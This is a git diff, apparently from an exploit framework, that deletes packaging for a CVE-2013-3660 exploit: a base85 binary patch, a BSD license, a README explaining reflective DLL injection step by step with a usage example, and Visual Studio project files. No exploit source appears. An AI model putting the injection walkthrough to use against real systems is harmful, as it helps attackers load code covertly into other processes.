z#arJ@FW=F=@<`3Dv9CPPn6Y`q!pT=T8ctTUFCDe{5BL4?)Gxm5xbv42M?d=KMIY@s
zcJ=kkm;EqvMC`@C?0P2lqt~~8k=gOo!M~pD_~3@yAKd5h?%Da{^PYTW-6bDAKIUBS
z#nJv{_xKm>%F3BG>hMz!I8u@}{pORroTvUYGxhbEDS?N7a?_caPj)_<(3Jng%H)Fm
zUj=Rov<;tGf9k#YzkIOkuUBn(tYzjOYRa;A{rsm1_l8fJy?wZBFHnBB=XdfwC7v(c
zx26t!`|%3->vG>znDYLFhM$&QQ2RIcwl_z5FZpoV#V_su+}#>8botmz$8LE2sZZVM
zPrg`O@@&6Xlke$pTT(ZVy8TbTU%ln6zqq%4_0`^j<>%kF=U0c_*Jt1SLC*HqRzLXX
zUGAT3&r9)V{x0sdpFQjT<NQ}vJ3PO>?74lb-NT0N_;B+pDW-zJ?e2of)0^*nE^p}t
zzn$fN`_t<i`oH#*6&HS)=^o~O;)vskt3JM~@fvsahDQ%?E?hdM^$(NN=HAhN&(Qqa
zYR~+5S?Z6!a9(oz+~K25O&eTS)bF?7J@%)Yl&{`SIaD_-^3vymAKmk0M9Plko>Aw#
z_>e#Oz3ZHoTZbGN`kwjIajR}}Jo%&7nx?+{#NAIm_JaAtqTihV)TBo;r@s_Ca`?Ez
zi8kwmyl3_<9De_F!}_K_Zms?@xZ|>i|5A6;)E~RH<knspKmJDVoUdx{f42YX>hljL
z{_&B$2U-k&c(U!=W*ute@K~sCs8NjFYAK3;KmSS&&^pO-(s*m0b-HzdwZeL*b-DFE
z>+{xEtlO-+toy77t$(n7WIbXXmoz>pKWS!?H)&zgZAmprE0XR_x<Bb>N$ZlHPuiWd
zKk0*{BS~FJiY>-=vCV3`(KgLiXe+T**?wtz&i1nHb=&W4@7mtC9kCs^owA*=U6ec|
z*_!N3&PdKm&P|?{JUh84c}eoU$*Yoon*2oauaaL#{%vwo^3LS_$!*DhNd9y3r^#O@
z_qRveFScK9PqZi5C)<ncnU496ZH_M;igTbd&6($%>74IubiU^Ni!(fBT1sikk5WEP
ziFZv-ott`l>Wb9oQ!h!oGVPkQ%(S^_i_`8-`+3?EX}?L^oCY%!IBx|HJjU0J$BfsQ
z%%(d`51MwF_L;g&gUr{Olg(qy3(dbae{GJmTx0QAZn2bGYApfFYRfMyTP!V>y_SQP
zV|=ym9P3c)_0}Y7x^=vDs<ps+t96m}4(m$mkFAecpMs+=TX$Q-k_IFVNxCX&WRfc>
zD=8;wTGE`P#Yqn(Ic&MMnYLov65Cz2Rkmm0*FHGbZi`5cOpZ&wB-x%kKe;S<Y4VEX
zP07DYels}=PE55gvj57y!ye^0-x2R9bv)tN<QU*|IHx=Ba^CM;?|jDjyz>=jlXF<g
z)hRE#T3lybQK=JBZ%&<`x+ry7YGdj%sZFWxr+$&zKkdS_%hIk*yD4o>T2<OpX}?SR
zAnj<{S7{OMLGDZ4SGbLCr#sy}!9CqQ%YCc+4)-$mTK5L`3+`9lzjp`SpSq8`zjR9-
zT?!8k#sS6{<Hg1y#w(527_T=b8B>j;j9JE9<7DH_#<|8KW0`T0@eboMW4-Y{<7(qt
z<D<r>jL#aMH@;%rYTRl3o$>d^ca81Fpz#yqUyWZH6;prHd8R?8c+(Z8ADTv*tR{!a
zZ5nIJHcc|!WSV92no3QTrp2Zj(+X3-^nhuN>0#58reB$!Greqj&9vRL$F$${w&{J-
zVbjN^W2Td)uT1^S1I@AKc=Hd;Ln&LM*=9~Nk2YtSCz_|2XP67k3(Skn_m~^ZKQljW
zZZZGCe9Ao7GTl;USz)=?@`UA=mi?AbEm_w0s1sjU<CAVm+MCpo^m)>kN$1;!*_^h~
zwh6YIY|CuFvF)~X*}k$}nVg)Qn!E=2ZM45<zu)nDM~7pW^B(6T&W+B)&JJf-N>s|6
zl;V_%l-pA7PkA_{G3AAnEh+m_u5{(Q%3bfLo=CkeZFJg1%4S7cv^$AXnChP6UgCbh
z{fzrX_jdO#cbi)V2c3v<f1?ThK5Tr>m|^mp)|&oey4)OQ$*^QwCLyJtTMX7XYWYH|
zABkLJeb~Ce`Wx#`Yn%13wZnSMdT!FiNgm|!De7`R+a<PfwkK`Bvb}11&-R(^Z??yh
zpGw}4ye&D}KFEHlJz!sDf5`rX{g?K)?1$_h+W%@F?zq-rbT}R9jyaBU$8C;kN4?`d
z#{-Tvjz=BG9j6?2XR33I^G0Vr(mBt$&G|cL(0R;Rkn%I~+nln;^;g%qse@CmPPL?Z
zQuC3~61C2*PJK9ad+Og(!_%VDu1}khw%dKgO-6G$uLmed+C9dV#x=%$#=jUXNQTGc
zqvk$E*}q}>gXuF<n0b(SIQ4g&`DSyed8PSb^G5Sl^Fi|hYS)D1H2Z%0d5-%@VSi_H
z%C3~XDaTU6T*F*Rt`yf;*HqU`SBb02RqLvE-S7IT>ld!aUB7ZY=X%Mtg}SuQ^|q_s
zb<8y|H8%B<)XPb^HTAaC`>9nYQctH|mbM`60os<`X|0sn<L)=y??}35b3PJSVS3!O
z*|d!`wwex_+DPS9W{)}BoNLZEPeTT0BZWog-<UU<H=CQx+s)Tlk}SEFsg@a**_J}&
z@L9_TmZ0URrPFfU(q%bqQLF}9oP6sv>kR8`Yk%8d+c8^w^3Y@ta(6U&qJ5_Q_x8{1
zUG~9_6vrq>v15_r4oc@`N0Z}CN0jq?=f%z+IEOl~b{d_@w4)wpHf`xm&N<En&PwN<
z&L25fI)CC^>wMDrqH~AyE$92r&zz^6XPkplE>9^>c_d|X%DX9_rJPEc2A7_OFOyPt
zq>f2jp4O1|tF#}uKbCw~aDEWDgf?L@HUAb<v1zGkm1z>CGT%~RnPGj>`mFVBt0}1{
zDc<%P{lu_jWAfDG(&U=t$C95;{#)_@dyajIz1{w?y`SS5$6?1vX9_7SrHy;V+3vh4
z<)<l+rZlC*x~@>mF5Pw1wJLQfZTvlHfwUi|JxE*s2(A6oY0soRpSCIOwY05iEopnw
z4y3)6_LsC<+%l+6Cw(=>I-?Q!*lV5vpDQePS)#00(kr%Fk0pJP^jNaho^IcZ#D8f2
z++OWi?bz#>;(Rf+B~?B^V8p-6ly1s2Wzja}n(|H4OfyWgO@*c+(~Y*rY=5#nVxR3O
zqJ4eKEzGFF{ZQkL#_7g>v_mdhpc_Nwzs&rU`E~Oib1QP%W<F$YHy<_!&1Q?;;<BV$
zGHHQcu(Vp<wj8pwTMk?L(c=_Yi>xK|+&=4K>r!hC{r6sa?KbNnYrA!dt-s@`6tC+}
zSA**r*PmUZQ;B$^Hb-(-@{5jU$9_kIbEMPk#Jq`n002GpMWzx{g~{r$J6zQ3rH<u}
zmE?M@W4&X8<9Wws$9Bga$3e#-%Ht??{ItX1jCRI3hd753p3<tdNhL0yYpH9wYo%+o
zYprX&YlG`~*Jjst*B;kF*CE$oO6s`lw9Akhof?-qBz0KoNa~R*H8VAvR$xYIA?<)K
zb!qDI)Rn2LQ`e@hPu)O2zL_>*PwK(cL#c;TkER}{z8TV@)8f*Gqzy|OnPyFM(Z^?}
z<<njirj?}m(v~8PE7Mk|txa2>wgCy)oVK0PKbUqX?J)h^@wC%v26wbO&OL<D^GLVV
z?Q&<jv)%db8SX-NiQDI1>R#?%>0V8*x1N6QdG}`8-97Gu?nCaw?xXa6r$xrwIit&D
zg~1qYjHCA(W*lj>8ePUrW41BhIKx<IEHV0wOO4BEucX&oZ`?qix7oPexW{<Vc*uCz
zc+_~@c-m+%MVsPGLrlZezRra_Wg|;7kfRdXwxy=!rj@4EwC(Fn8%)pBibxN4&~%9Y
z?WpOv>9omUjyA`chnR<%N1Cn3RVM99zS^&qn0@A@=H;}4tIcc8>&+X?&(pqaN74==
zWrxj2&Bx8B%?3-fCC)O$GR!j4VnyOI={@pkc?vBh7N2FQWx1u!vdXf?vd+?I*=X6s
zM|)e4#x`UzNPE;pTNG)HwZ>Z$tRt*OtDUh>mNl1_X*M!ifqd3j>#VEjeb!kUtsAYI
ztWDMy>Q@_*8nkv=yR1r5WKwKWd{RQvh$Lf@Jt>`0QZBvHY}$qjMoKkFbxEs|)-dX9
zOxl>VDXA%`C8;&3EvY>znAE9`KO=3iws>2DZG_Eev)j^bS&Xcv*=E~{Y!$Y}wi;U<
z<Eu5cb+$&^M%yM^ldZ+pYHMSp6|{BIV=IieVw2;O6Ou>J2HBI-dyP*kk{8n=)iFk0
zle{juF?l0nv8Lpf<W|P0?a9I9&g8CS#U5#owa42N>?7<(yPXyz%bshWW}nS?wZgvG
zUSqGL?_6VFXK%D`v~RLE*<0+b_BPtKpuLkeT5&`=Vj0aPI7ZN)+NpP0j$Fqy2W^L=
z!m-#<<EV42qE}t#Xmo63yw~JtakM(x9PN&vqtnsFSUA!d>x_3MI7iT)+nwpoEN8BB
znsc_Z$XVfB?5uItIafK?IM+#i@8tdg5nbwG4K=AV)lRLM#^`u?+B#}VOIk23(mleR
z<u0NI)VUjx`xZug@-~)$zeptA$jGk3xXQTE*lO%FMw`^j4p?=IV=TBBd96WW>yX)1
zNbMTrb{&%2i0p1edN(1zO-OJHGOYE4hfM8Aau8YWM4G#hXT@wVM<Ua)NOe4Noq${$
zk!(A%osM*8eWTwjF;^hzi;?vjq`eM#Uxmc4LFU&X^^M5=MkHVFTU&ayv<4)97*e09
zw*EfLV&r{$@(5Zpqtgm6U2roKerBs24Z1pMySiw-lvG1%BrRAhZCC<r*a%uNBkh=7
PZOO7yXG@#=zx4S(x77@i

literal 0
HcmV?d00001

diff --git a/external/source/exploits/cve-2013-3660/LICENSE.txt b/external/source/exploits/cve-2013-3660/LICENSE.txt
deleted file mode 100755
index f217025f51..0000000000
--- a/external/source/exploits/cve-2013-3660/LICENSE.txt
+++ /dev/null
@@ -1,25 +0,0 @@
-Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted 
-provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright notice, this list of 
-conditions and the following disclaimer.
-
-    * Redistributions in binary form must reproduce the above copyright notice, this list of 
-conditions and the following disclaimer in the documentation and/or other materials provided 
-with the distribution.
-
-    * Neither the name of Harmony Security nor the names of its contributors may be used to
-endorse or promote products derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/Readme.md b/external/source/exploits/cve-2013-3660/Readme.md
deleted file mode 100755
index 8670897457..0000000000
--- a/external/source/exploits/cve-2013-3660/Readme.md
+++ /dev/null
@@ -1,71 +0,0 @@
-About
-=====
-
-Reflective DLL injection is a library injection technique in which the concept
-of reflective programming is employed to perform the loading of a library from
-memory into a host process. As such the library is responsible for loading
-itself by implementing a minimal Portable Executable (PE) file loader. It can
-then govern, with minimal interaction with the host system and process, how it
-will load and interact with the host.
-
-Injection works from Windows NT4 up to and including Windows 8, running on x86,
-x64 and ARM where applicable.
-
-Overview
-========
-
-The process of remotely injecting a library into a process is two fold. Firstly,
-the library you wish to inject must be written into the address space of the
-target process (Herein referred to as the host process). Secondly the library
-must be loaded into that host process in such a way that the library's run time
-expectations are met, such as resolving its imports or relocating it to a
-suitable location in memory.
-
-Assuming we have code execution in the host process and the library we wish to
-inject has been written into an arbitrary location of memory in the host
-process, Reflective DLL Injection works as follows.
-
-* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap
-shellcode, to the library's ReflectiveLoader function which is an exported
-function found in the library's export table.
-* As the library's image will currently exists in an arbitrary location in
-memory the ReflectiveLoader will first calculate its own image's current
-location in memory so as to be able to parse its own headers for use later on.
-* The ReflectiveLoader will then parse the host processes kernel32.dll export
-table in order to calculate the addresses of three functions required by the
-loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
-* The ReflectiveLoader will now allocate a continuous region of memory into
-which it will proceed to load its own image. The location is not important as
-the loader will correctly relocate the image later on.
-The library's headers and sections are loaded into their new locations in
-memory.
-* The ReflectiveLoader will then process the newly loaded copy of its image's
-import table, loading any additional library's and resolving their respective
-imported function addresses.
-* The ReflectiveLoader will then process the newly loaded copy of its image's
-relocation table.
-* The ReflectiveLoader will then call its newly loaded image's entry point
-function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully
-loaded into memory.
-* Finally the ReflectiveLoader will return execution to the initial bootstrap
-shellcode which called it, or if it was called via CreateRemoteThread, the
-thread will terminate.
-
-Build
-=====
-
-Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release
-mode to make inject.exe and reflective_dll.dll
-
-Usage
-=====
-
-To test use the inject.exe to inject reflective_dll.dll into a host process via
-a process id, e.g.:
-
-> inject.exe 1234
-	
-License
-=======
-
-Licensed under a 3 clause BSD license, please see LICENSE.txt for details.
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln b/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
deleted file mode 100755
index eff992d77c..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
deleted file mode 100755
index 33c6bd9515..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
+++ /dev/null
@@ -1,357 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="reflective_dll"
-	ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-	RootNamespace="reflective_dll"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="2"
-				InlineFunctionExpansion="1"
-				EnableIntrinsicFunctions="true"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
-				RuntimeLibrary="0"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="1"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-				CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			WholeProgramOptimization="0"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="2"
-				InlineFunctionExpansion="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				WholeProgramOptimization="false"
-				PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
-				RuntimeLibrary="0"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CompileAs="2"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="$(OutDir)\$(ProjectName).x64.dll"
-				LinkIncremental="1"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-				CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\src\ReflectiveDll.c"
-				>
-			</File>
-			<File
-				RelativePath=".\src\ReflectiveLoader.c"
-				>
-			</File>
-		</Filter>
-		<Filter
-			Name="Header Files"
-			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
-			>
-			<File
-				RelativePath=".\src\ReflectiveDLLInjection.h"
-				>
-			</File>
-			<File
-				RelativePath=".\src\ReflectiveLoader.h"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
deleted file mode 100755
index ed6cacb681..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ /dev/null
@@ -1,266 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|ARM">
-      <Configuration>Debug</Configuration>
-      <Platform>ARM</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|ARM">
-      <Configuration>Release</Configuration>
-      <Platform>ARM</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
-    <RootNamespace>reflective_dll</RootNamespace>
-    <Keyword>Win32Proj</Keyword>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v100</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
